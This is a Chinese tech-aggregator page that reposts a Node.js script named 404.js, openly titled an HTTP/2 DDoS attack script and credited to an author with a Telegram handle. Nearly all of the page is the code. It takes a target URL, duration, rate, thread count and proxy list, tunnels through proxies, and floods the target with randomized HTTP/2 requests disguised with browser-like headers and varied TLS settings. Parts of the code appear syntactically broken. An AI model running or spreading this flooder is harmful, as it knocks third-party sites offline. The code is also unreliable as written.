当前位置：首页 > article >正文

HTTP/2 ddos攻击脚本

article 2025/2/21 10:17:36

支持HTTP/2

脚本命名为:404.js 版权归alpha所有

作者tg:@alphachnhk

//SCRIPT DDoS By alpha tg@alphachnhk

const net = require("net");

const http2 = require("http2");

const tls = require("tls");

const cluster = require("cluster");

const url = require("url");

const crypto = require("crypto");

const fs = require("fs");

const axios = require('axios');

const cheerio = require('cheerio');

const gradient = require("gradient-string")

process.setMaxListeners(0);

require("events").EventEmitter.defaultMaxListeners = 0;

process.on('uncaughtException', function (exception) {

});

if (process.argv.length < 7){console.log(gradient.vice(`[!] node 404.js <HOST> <TIME> <RPS> <THREADS> <PROXY>.`));; process.exit();}

const headers = {};

function readLines(filePath) {

return fs.readFileSync(filePath, "utf-8").toString().split(/\r?\n/);

}

function randomIntn(min, max) {

return Math.floor(Math.random() * (max - min) + min);

}

function randomElement(elements) {

return elements[randomIntn(0, elements.length)];

}

function randstr(length) {

const characters =

"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";

let result = "";

const charactersLength = characters.length;

for (let i = 0; i < length; i++) {

result += characters.charAt(Math.floor(Math.random() * charactersLength));

}

return result;

}

const ip_spoof = () => {

const getRandomByte = () => {

return Math.floor(Math.random() * 255);

};

return `${getRandomByte()}.${getRandomByte()}.${getRandomByte()}.${getRandomByte()}`;

};

const spoofed = ip_spoof();

const args = {

target: process.argv[2],

time: parseInt(process.argv[3]),

Rate: parseInt(process.argv[4]),

threads: parseInt(process.argv[5]),

proxyFile: process.argv[6]

}

const sig = [

'ecdsa_secp256r1_sha256',

'ecdsa_secp384r1_sha384',

'ecdsa_secp521r1_sha512',

'rsa_pss_rsae_sha256',

'rsa_pss_rsae_sha384',

'rsa_pss_rsae_sha512',

'rsa_pkcs1_sha256',

'rsa_pkcs1_sha384',

'rsa_pkcs1_sha512'

];

const sigalgs1 = sig.join(':');

const cplist = [

"ECDHE-ECDSA-AES128-GCM-SHA256:HIGH:MEDIUM:3DES",

"ECDHE-ECDSA-AES128-SHA256:HIGH:MEDIUM:3DES",

"ECDHE-ECDSA-AES128-SHA:HIGH:MEDIUM:3DES",

"ECDHE-ECDSA-AES256-GCM-SHA384:HIGH:MEDIUM:3DES",

"ECDHE-ECDSA-AES256-SHA384:HIGH:MEDIUM:3DES",

"ECDHE-ECDSA-AES256-SHA:HIGH:MEDIUM:3DES",

"ECDHE-ECDSA-CHACHA20-POLY1305-OLD:HIGH:MEDIUM:3DES"

];

const accept_header = [

"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",

"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",

"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"

];

const lang_header = ["en-US,en;q=0.9"];

const encoding_header = ["gzip, deflate, br"];

const control_header = ["no-cache", "max-age=0"];

const refers = [

"https://www.google.com/",

"https://www.facebook.com/",

"https://www.twitter.com/",

"https://www.youtube.com/",

"https://www.linkedin.com/"

];

const defaultCiphers = crypto.constants.defaultCoreCipherList.split(":");

const ciphers1 = "GREASE:" + [

defaultCiphers[2],

defaultCiphers[1],

defaultCiphers[0],

...defaultCiphers.slice(3)

].join(":");

const uap = [

"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5623.200 Safari/537.36",

"Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5638.217 Safari/537.36",

"Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5650.210 Safari/537.36",

"Mozilla/5.0 (Macintosh; Intel Mac OS X 11_15) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.221 Safari/537.36",

"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5625.214 Safari/537.36",

"Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5650.210 Safari/537.36"

];

var cipper = cplist[Math.floor(Math.floor(Math.random() * cplist.length))];

var siga = sig[Math.floor(Math.floor(Math.random() * sig.length))];

var uap1 = uap[Math.floor(Math.floor(Math.random() * uap.length))];

var Ref = refers[Math.floor(Math.floor(Math.random() * refers.length))];

var accept = accept_header[Math.floor(Math.floor(Math.random() * accept_header.length))];

var lang = lang_header[Math.floor(Math.floor(Math.random() * lang_header.length))];

var encoding = encoding_header[Math.floor(Math.floor(Math.random() * encoding_header.length))];

var control = control_header[Math.floor(Math.floor(Math.random() * control_header.length))];

var proxies = readLines(args.proxyFile);

const parsedTarget = url.parse(args.target);

if (cluster.isMaster) {

for (let counter = 1; counter <= args.threads; counter++) {

cluster.fork();

}

} else {

setInterval(runFlooder);

};

class NetSocket {

constructor(){}

HTTP(options, callback) {

const parsedAddr = options.address.split(":");

const addrHost = parsedAddr[0];

const payload = "CONNECT " + options.address + ":443 HTTP/1.1\r\nHost: " + options.address + ":443\r\nConnection: Keep-Alive\r\n\r\n";

const buffer = new Buffer.from(payload);

const connection = net.connect({

host: options.host,

port: options.port

});

//connection.setTimeout(options.timeout * 600000);

connection.setTimeout(options.timeout * 100000);

connection.setKeepAlive(true, 100000);

connection.on("connect", () => {

connection.write(buffer);

});

connection.on("data", chunk => {

const response = chunk.toString("utf-8");

const isAlive = response.includes("HTTP/1.1 200");

if (isAlive === false) {

connection.destroy();

return callback(undefined, "error: invalid response from proxy server");

}

return callback(connection, undefined);

});

connection.on("timeout", () => {

connection.destroy();

return callback(undefined, "error: timeout exceeded");

});

connection.on("error", error => {

connection.destroy();

return callback(undefined, "error: " + error);

});

}

const Socker = new NetSocket();

headers[":method"] = "GET";

headers[":authority"] = parsedTarget.host;

headers[":path"] = parsedTarget.path + "?" + randstr(5) + "=" + randstr(25);

headers[":scheme"] = "https";

headers["x-forwarded-proto"] = "https";

headers["accept-language"] = lang;

headers["accept-encoding"] = encoding;

//headers["X-Forwarded-For"] = spoofed;

//headers["X-Forwarded-Host"] = spoofed;

//headers["Real-IP"] = spoofed;

headers["cache-control"] = control;

headers["sec-ch-ua"] = '"Not.A/Brand";v="8", "Chromium";v="114", "Google Chrome";v="114"';

headers["sec-ch-ua-mobile"] = "?0";

headers["sec-ch-ua-platform"] = "Windows";

//headers["origin"] = "https://" + parsedTarget.host;

//headers["referer"] = "https://" + parsedTarget.host;

headers["upgrade-insecure-requests"] = "1";

headers["accept"] = accept;

headers["user-agent"] = randstr(15);

headers["sec-fetch-dest"] = "document";

headers["sec-fetch-mode"] = "navigate";

headers["sec-fetch-site"] = "none";

headers["TE"] = "trailers";

//headers["Trailer"] = "Max-Forwards";

headers["sec-fetch-user"] = "?1";

headers["x-requested-with"] = "XMLHttpRequest";

function runFlooder() {

const proxyAddr = randomElement(proxies);

const parsedProxy = proxyAddr.split(":");

//headers[":authority"] = parsedTarget.host;

headers["referer"] = "https://" + parsedTarget.host + "/?" + randstr(15);

headers["origin"] = "https://" + parsedTarget.host;

const proxyOptions = {

host: parsedProxy[0],

port: ~~parsedProxy[1],

address: parsedTarget.host + ":443",

timeout: 100,

};

Socker.HTTP(proxyOptions, (connection, error) => {

if (error) return

connection.setKeepAlive(true, 600000);

const tlsOptions = {

host: parsedTarget.host,

port: 443,

secure: true,

ALPNProtocols: ['h2'],

sigals: siga,

socket: connection,

ciphers: tls.getCiphers().join(":") + cipper,

ecdhCurve: "prime256v1:X25519",

host: parsedTarget.host,

rejectUnauthorized: false,

servername: parsedTarget.host,

secureProtocol: "TLS_method",

};

const tlsConn = tls.connect(443, parsedTarget.host, tlsOptions);

tlsConn.setKeepAlive(true, 60000);

const client = http2.connect(parsedTarget.href, {

protocol: "https:",

settings: {

headerTableSize: 65536,

maxConcurrentStreams: 2000,

initialWindowSize: 65535,

maxHeaderListSize: 65536,

enablePush: false

maxSessionMemory: 64000,

maxDeflateDynamicTableSize: 4294967295,

createConnection: () => tlsConn,

socket: connection,

});

client.settings({

headerTableSize: 65536,

maxConcurrentStreams: 2000,

initialWindowSize: 6291456,

maxHeaderListSize: 65536,

enablePush: false

});

client.on("connect", () => {

const IntervalAttack = setInterval(() => {

for (let i = 0; i < args.Rate; i++) {

//headers[":path"] = parsedTarget.path + "?" + randstr(5) + "=" + randstr(25);

const request = client.request(headers)

.on("response", response => {

request.close();

request.destroy();

return

});

request.end();

}

}, 1000);

});

client.on("close", () => {

client.destroy();

connection.destroy();

return

});

}),function (error, response, body) {

};

}

console.log(gradient.vice(`[!] SUCCESSFULLY SENT ATTACK.`));

const KillScript = () => process.exit(1);

setTimeout(KillScript, args.time * 1000);

查看全文

http://www.kler.cn/a/546086.html

Pytorch深度学习教程_1_Python基础快速掌握

Python用PyMC3马尔可夫链蒙特卡罗MCMC对疾病症状数据贝叶斯推断

wps配置deepseek

Texas Moves to Regulate AI 德克萨斯州着手规范人工智能

用户管理中心--注册登录功能的设计

【弹性计算】弹性计算的技术架构

单调队列与栈

分享一些处理复杂HTML结构的经验

闭源大语言模型的怎么增强:提示工程检索增强生成智能体

如何在 ONLYOFFICE 编辑器中使用 DeepSeek

python class详解

51单片机09 DS1302时钟

HTN77A0F:拥有强制脉宽调制的0.7A同步降压降压变换器资料参数

2025最新深度学习pytorch完整配置：conda/jupyter/vscode

解决DeepSeek服务器繁忙问题

Sentinel 持久化配置

『大模型笔记』怎样让Ollama启动的大模型常驻内存(显存)？

MySQL-SQL

记录阿里云CDN配置

在1panel中安装 crmeb pro 的简单说明

相关文章：